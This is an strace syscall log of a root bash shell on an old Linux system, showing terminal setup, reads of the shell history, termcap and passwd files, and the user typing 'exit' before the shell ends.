819   19:04:53 [400c8511] getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=1024}) = 0 <0.000007>
819   19:04:53 [400c2ce4] fcntl(255, F_GETFD) = -1 EBADF (Bad file descriptor) <0.000006>
819   19:04:53 [400c2ff1] dup2(4, 255)  = 255 <0.000020>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000007>
819   19:04:53 [400c8b54] ioctl(255, TIOCGPGRP, [818]) = 0 <0.000012>
819   19:04:53 [400ae257] getpid()      = 819 <0.000006>
819   19:04:53 [400ae5d1] setpgid(0, 819) = 0 <0.000006>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TSTP TTIN TTOU], [], 8) = 0 <0.000007>
819   19:04:53 [400c8b54] ioctl(255, TIOCSPGRP, [819]) = 0 <0.000029>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
819   19:04:53 [400c2ce4] fcntl(255, F_SETFD, FD_CLOEXEC) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGCHLD, {0x805c190, [], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000008>
819   19:04:53 [400c8b54] ioctl(255, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000012>
819   19:04:53 [400c16cd] stat("/var/spool/mail/root", 0xbffffdb0) = -1 ENOENT (No such file or directory) <0.000029>
819   19:04:53 [400a4f7d] time(NULL)    = 1142550293 <0.000006>
819   19:04:53 [400c2a24] open("/root/.bash_history", O_RDONLY) = 4 <0.000023>
819   19:04:53 [400c180d] fstat(4, {st_mode=S_IFREG|0600, st_size=2005, ...}) = 0 <0.000008>
819   19:04:53 [400c2ad4] read(4, "whoami\nexit\nexit\nftp localhost\n/"..., 2005) = 2005 <0.000029>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000009>
819   19:04:53 [400c16cd] stat("/root/.bash_history", {st_mode=S_IFREG|0600, st_size=2005, ...}) = 0 <0.000017>
819   19:04:53 [400c2a24] open("/root/.bash_history", O_RDONLY) = 4 <0.000015>
819   19:04:53 [400c180d] fstat(4, {st_mode=S_IFREG|0600, st_size=2005, ...}) = 0 <0.000008>
819   19:04:53 [400c2ad4] read(4, "whoami\nexit\nexit\nftp localhost\n/"..., 2005) = 2005 <0.000018>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000008>
819   19:04:53 [400c8a6c] brk(0x809f000) = 0x809f000 <0.000016>
819   19:04:53 [400c8a6c] brk(0x80a0000) = 0x80a0000 <0.000009>
819   19:04:53 [400c8b54] ioctl(255, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000015>
819   19:04:53 [400c2ce4] fcntl(0, F_GETFL) = 0x2 (flags O_RDWR) <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000008>
819   19:04:53 [400a4f7d] time(NULL)    = 1142550293 <0.000006>
819   19:04:53 [400ae2e7] geteuid()     = 0 <0.000006>
819   19:04:53 [400ae2e7] geteuid()     = 0 <0.000006>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TTOU], [], 8) = 0 <0.000010>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TSTP TTIN TTOU], [], 8) = 0 <0.000006>
819   19:04:53 [400c8b54] ioctl(255, TIOCSPGRP, [819]) = 0 <0.000031>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000006>
819   19:04:53 [400c8a6c] brk(0x80a1000) = 0x80a1000 <0.000018>
819   19:04:53 [400c2a24] open("/etc/termcap", O_RDONLY) = 4 <0.000030>
819   19:04:53 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=625272, ...}) = 0 <0.000008>
819   19:04:53 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000015>
819   19:04:53 [400ce1e9] _llseek(4, 0, [0], SEEK_SET) = 0 <0.000008>
819   19:04:53 [400c2ad4] read(4, "######## TERMINAL TYPE DESCRIPTI"..., 4096) = 4096 <0.000054>
819   19:04:53 [400c2ad4] read(4, "or their hardware\n# (notably DEC"..., 4096) = 4096 <0.000027>
819   19:04:53 [400c2ad4] read(4, "The terminal enquire string <u9>"..., 4096) = 4096 <0.000028>
819   19:04:53 [400c2ad4] read(4, " redistribute freely.\n# There ar"..., 4096) = 4096 <0.000024>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000011>
819   19:04:53 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000017>
819   19:04:53 [400c8b54] ioctl(0, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 <0.000010>
819   19:04:53 [400c8b54] ioctl(0, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 <0.000007>
819   19:04:53 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000013>
819   19:04:53 [400ae2b7] getuid()      = 0 <0.000007>
819   19:04:53 [400c2a24] open("/etc/passwd", O_RDONLY) = 4 <0.000028>
819   19:04:53 [400c2ce4] fcntl(4, F_GETFD) = 0 <0.000008>
819   19:04:53 [400c2ce4] fcntl(4, F_SETFD, FD_CLOEXEC) = 0 <0.000006>
819   19:04:53 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=704, ...}) = 0 <0.000008>
819   19:04:53 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000015>
819   19:04:53 [400c2ad4] read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 704 <0.000035>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000010>
819   19:04:53 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000010>
819   19:04:53 [400c16cd] stat("/root/.inputrc", 0xbffff4b8) = -1 ENOENT (No such file or directory) <0.000018>
819   19:04:53 [400c8a6c] brk(0x80a2000) = 0x80a2000 <0.000012>
819   19:04:53 [400c8a6c] brk(0x80a3000) = 0x80a3000 <0.000009>
819   19:04:53 [400c8a6c] brk(0x80a4000) = 0x80a4000 <0.000008>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_BLOCK, [INT], [], 8) = 0 <0.000008>
819   19:04:53 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000013>
819   19:04:53 [400c8b54] ioctl(0, SNDCTL_TMR_START, {B38400 opost isig -icanon -echo ...}) = 0 <0.000016>
819   19:04:53 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig -icanon -echo ...}) = 0 <0.000007>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGINT, {0x807d4d0, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000009>
819   19:04:53 [4003aae2] rt_sigaction(SIGALRM, {0x807d4d0, [], 0x4000000}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGWINCH, {0x807d490, [], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [400c1cd3] fstat(2, {st_mode=S_IFCHR|0620, st_rdev=makedev(4, 1), ...}) = 0 <0.000009>
819   19:04:53 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000015>
819   19:04:53 [400c8b54] ioctl(2, TCGETS, {B38400 opost isig -icanon -echo ...}) = 0 <0.000011>
819   19:04:53 [400c2b14] write(2, "bash# ", 6) = 6 <0.000045>
819   19:04:53 [400c2ad4] read(0, 0xbffff55b, 1) = ? ERESTARTSYS (To be restarted) <2.372893>
819   19:04:56 [400c8b54] ioctl(2, TCXONC, TCOON) = 0 <0.000015>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_BLOCK, [INT], [INT], 8) = 0 <0.000007>
819   19:04:56 [400c8b54] ioctl(0, SNDCTL_TMR_START, {B38400 opost isig icanon echo ...}) = 0 <0.000015>
819   19:04:56 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000007>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_SETMASK, [INT], NULL, 8) = 0 <0.000006>
819   19:04:56 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x807d4d0, [], 0x4000000}, 8) = 0 <0.000007>
819   19:04:56 [4003aae2] rt_sigaction(SIGALRM, {0x804b8c0, [], 0x4000000}, {0x807d4d0, [], 0x4000000}, 8) = 0 <0.000006>
819   19:04:56 [4003aae2] rt_sigaction(SIGWINCH, {SIG_DFL}, {0x807d490, [], 0x4000000}, 8) = 0 <0.000007>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_BLOCK, NULL, [INT], 8) = 0 <0.000006>
819   19:04:56 [400ae257] getpid()      = 819 <0.000008>
819   19:04:56 [4003ad41] kill(819, SIGINT) = 0 <0.000009>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TSTP TTIN TTOU], [INT], 8) = 0 <0.000006>
819   19:04:56 [400c8b54] ioctl(255, TIOCSPGRP, [819]) = 0 <0.000029>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_SETMASK, [INT], NULL, 8) = 0 <0.000006>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000005>
819   19:04:56 [400c2b14] write(2, "\n", 1) = 1 <0.000065>
819   19:04:56 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000006>
819   19:04:56 [400a4f7d] time(NULL)    = 1142550296 <0.000006>
819   19:04:56 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000006>
819   19:04:56 [400a4f7d] time(NULL)    = 1142550296 <0.000005>
819   19:04:56 [400ae2e7] geteuid()     = 0 <0.000006>
819   19:04:56 [400ae2e7] geteuid()     = 0 <0.000005>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TTOU], [], 8) = 0 <0.000008>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TSTP TTIN TTOU], [], 8) = 0 <0.000007>
819   19:04:56 [400c8b54] ioctl(255, TIOCSPGRP, [819]) = 0 <0.000028>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
819   19:04:56 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000006>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_BLOCK, [INT], [], 8) = 0 <0.000006>
819   19:04:56 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000010>
819   19:04:56 [400c8b54] ioctl(0, SNDCTL_TMR_START, {B38400 opost isig -icanon -echo ...}) = 0 <0.000017>
819   19:04:56 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig -icanon -echo ...}) = 0 <0.000007>
819   19:04:56 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
819   19:04:56 [4003aae2] rt_sigaction(SIGINT, {0x807d4d0, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000007>
819   19:04:56 [4003aae2] rt_sigaction(SIGALRM, {0x807d4d0, [], 0x4000000}, {0x804b8c0, [], 0x4000000}, 8) = 0 <0.000007>
819   19:04:56 [4003aae2] rt_sigaction(SIGWINCH, {0x807d490, [], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:56 [400c2b14] write(2, "bash# ", 6) = 6 <0.000034>
819   19:04:56 [400c2ad4] read(0, "e", 1) = 1 <1.160360>
819   19:04:57 [400c2b14] write(2, "e", 1) = 1 <0.000025>
819   19:04:57 [400c2ad4] read(0, "x", 1) = 1 <0.218846>
819   19:04:57 [400c2b14] write(2, "x", 1) = 1 <0.000021>
819   19:04:57 [400c2ad4] read(0, "i", 1) = 1 <0.138823>
819   19:04:57 [400c2b14] write(2, "i", 1) = 1 <0.000020>
819   19:04:57 [400c2ad4] read(0, "t", 1) = 1 <0.158263>
819   19:04:57 [400c2b14] write(2, "t", 1) = 1 <0.000022>
819   19:04:57 [400c2ad4] read(0, "\r", 1) = 1 <0.153929>
819   19:04:57 [400c2b14] write(2, "\n", 1) = 1 <0.000051>
819   19:04:57 [4003acb5] rt_sigprocmask(SIG_BLOCK, [INT], [], 8) = 0 <0.000009>
819   19:04:57 [400c8b54] ioctl(0, SNDCTL_TMR_START, {B38400 opost isig icanon echo ...}) = 0 <0.000020>
819   19:04:57 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000007>
819   19:04:57 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000005>
819   19:04:57 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x807d4d0, [], 0x4000000}, 8) = 0 <0.000007>
819   19:04:57 [4003aae2] rt_sigaction(SIGALRM, {0x804b8c0, [], 0x4000000}, {0x807d4d0, [], 0x4000000}, 8) = 0 <0.000006>
819   19:04:57 [4003aae2] rt_sigaction(SIGWINCH, {SIG_DFL}, {0x807d490, [], 0x4000000}, 8) = 0 <0.000007>
819   19:04:57 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000006>
819   19:04:58 [400c8a6c] brk(0x80a5000) = 0x80a5000 <0.000019>
819   19:04:58 [400c2b14] write(2, "exit\n", 5) = 5 <0.000062>
819   19:04:58 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000007>
819   19:04:58 [400c16cd] stat("/root/.bash_history", {st_mode=S_IFREG|0600, st_size=2005, ...}) = 0 <0.000027>
819   19:04:58 [400c2a24] open("/root/.bash_history", O_WRONLY|O_APPEND) = 4 <0.000021>
819   19:04:58 [400c2b14] write(4, "exit\n", 5) = 5 <0.000037>
819   19:04:58 [400c2a8d] close(4)      = 0 <0.000011>
819   19:04:58 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TSTP TTIN TTOU], [], 8) = 0 <0.000008>
819   19:04:58 [400c8b54] ioctl(255, TIOCSPGRP, [818]) = 0 <0.000032>
819   19:04:58 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
819   19:04:58 [400ae5d1] setpgid(0, 818) = 0 <0.000020>
819   19:04:58 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000021>
819   19:04:58 [400add1d] _exit(1)      = ?
